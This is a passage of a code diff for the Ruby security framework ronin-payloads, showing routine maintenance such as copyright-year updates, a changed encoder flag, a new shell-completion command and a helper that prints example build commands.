raise(BuildFailed,"cc command failed: #{args.join(' ')}")
|
99
|
-
when nil
|
100
|
-
raise(BuildFailed,"cc command not installed")
|
101
|
-
end
|
102
|
-
end
|
103
|
-
|
104
48
|
end
|
105
49
|
end
|
106
50
|
end
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -42,7 +42,7 @@ module Ronin
|
|
42
42
|
# --format Formats the outputed data
|
43
43
|
# -p, --param NAME=VALUE Sets a param
|
44
44
|
# -o, --output FILE Output file to write the built payload to
|
45
|
-
# -
|
45
|
+
# -E, --encoder ENCODER Adds the encoder to the payload
|
46
46
|
# --encoder-param ENCODER.NAME=VALUE
|
47
47
|
# Sets a param for one of the encoders
|
48
48
|
# -D, --debug Enables debugging messages
|
@@ -65,7 +65,7 @@ module Ronin
|
|
65
65
|
},
|
66
66
|
desc: 'Output file to write the built payload to'
|
67
67
|
|
68
|
-
option :encoder, short: '-
|
68
|
+
option :encoder, short: '-E',
|
69
69
|
value: {
|
70
70
|
type: String,
|
71
71
|
usage: 'ENCODER'
|
@@ -0,0 +1,64 @@
|
|
1
|
+
# frozen_string_literal: true
|
2
|
+
#
|
3
|
+
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
|
+
# payloads.
|
5
|
+
#
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
|
+
#
|
8
|
+
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
|
+
# it under the terms of the GNU Lesser General Public License as published
|
10
|
+
# by the Free Software Foundation, either version 3 of the License, or
|
11
|
+
# (at your option) any later version.
|
12
|
+
#
|
13
|
+
# ronin-payloads is distributed in the hope that it will be useful,
|
14
|
+
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
15
|
+
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
16
|
+
# GNU Lesser General Public License for more details.
|
17
|
+
#
|
18
|
+
# You should have received a copy of the GNU Lesser General Public License
|
19
|
+
# along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>.
|
20
|
+
#
|
21
|
+
|
22
|
+
require 'ronin/payloads/root'
|
23
|
+
require 'ronin/core/cli/completion_command'
|
24
|
+
|
25
|
+
module Ronin
|
26
|
+
module Payloads
|
27
|
+
class CLI
|
28
|
+
module Commands
|
29
|
+
#
|
30
|
+
# Manages the shell completion rules for `ronin-payloads`.
|
31
|
+
#
|
32
|
+
# ## Usage
|
33
|
+
#
|
34
|
+
# ronin-payloads completion [options]
|
35
|
+
#
|
36
|
+
# ## Options
|
37
|
+
#
|
38
|
+
# --print Prints the shell completion file
|
39
|
+
# --install Installs the shell completion file
|
40
|
+
# --uninstall Uninstalls the shell completion file
|
41
|
+
# -h, --help Print help information
|
42
|
+
#
|
43
|
+
# ## Examples
|
44
|
+
#
|
45
|
+
# ronin-payloads completion --print
|
46
|
+
# ronin-payloads completion --install
|
47
|
+
# ronin-payloads completion --uninstall
|
48
|
+
#
|
49
|
+
# @since 0.2.0
|
50
|
+
#
|
51
|
+
class Completion < Core::CLI::CompletionCommand
|
52
|
+
|
53
|
+
completion_file File.join(ROOT,'data','completions','ronin-payloads')
|
54
|
+
|
55
|
+
man_dir File.join(ROOT,'man')
|
56
|
+
man_page 'ronin-payloads-completion.1'
|
57
|
+
|
58
|
+
description 'Manages the shell completion rules for ronin-payloads'
|
59
|
+
|
60
|
+
end
|
61
|
+
end
|
62
|
+
end
|
63
|
+
end
|
64
|
+
end
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -3,7 +3,7 @@
|
|
3
3
|
# ronin-payloads - A Ruby micro-framework for writing and running exploit
|
4
4
|
# payloads.
|
5
5
|
#
|
6
|
-
# Copyright (c) 2007-
|
6
|
+
# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
|
7
7
|
#
|
8
8
|
# ronin-payloads is free software: you can redistribute it and/or modify
|
9
9
|
# it under the terms of the GNU Lesser General Public License as published
|
@@ -110,9 +110,52 @@ module Ronin
|
|
110
110
|
print_description(payload)
|
111
111
|
print_references(payload)
|
112
112
|
print_params(payload)
|
113
|
+
print_payload_usage(payload)
|
113
114
|
end
|
114
115
|
end
|
115
116
|
|
117
|
+
#
|
118
|
+
# Prints an example `ronin-payloads build` command for the payload.
|
119
|
+
#
|
120
|
+
# @param [Class<Payload>] payload
|
121
|
+
#
|
122
|
+
# @since 0.2.0
|
123
|
+
#
|
124
|
+
def print_payload_usage(payload)
|
125
|
+
puts "Usage:"
|
126
|
+
puts
|
127
|
+
puts " $ #{example_build_command(payload)}"
|
128
|
+
puts
|
129
|
+
end
|
130
|
+
|
131
|
+
#
|
132
|
+
# Builds an example `ronin-payloads build` command for the payload.
|
133
|
+
#
|
134
|
+
# @param [Class<Payload>] payload
|
135
|
+
#
|
136
|
+
# @return [String]
|
137
|
+
# The example `ronin-payloads build` command.
|
138
|
+
#
|
139
|
+
# @since 0.2.0
|
140
|
+
#
|
141
|
+
def example_build_command(payload)
|
142
|
+
command = ['ronin-payloads', 'build']
|
143
|
+
|
144
|
+
if options[:file]
|
145
|
+
command << '-f' << options[:file]
|
146
|
+
else
|
147
|
+
command << payload.id
|
148
|
+
end
|
149
|
+
|
150
|
+
payload.params.each_value do |param|
|
151
|
+
if param.required? && !param.default
|
152
|
+
command << '-p' << "#{param.name}=#{param_usage(param)}"
|
153
|
+
end
|
154
|
+
end
|
155
|
+
|
156
|
+
return command.join(' ')
|
157
|
+
end
|
158
|
+
|
116
159
|
end
|
117
160
|
end
|
118
161
|
end
|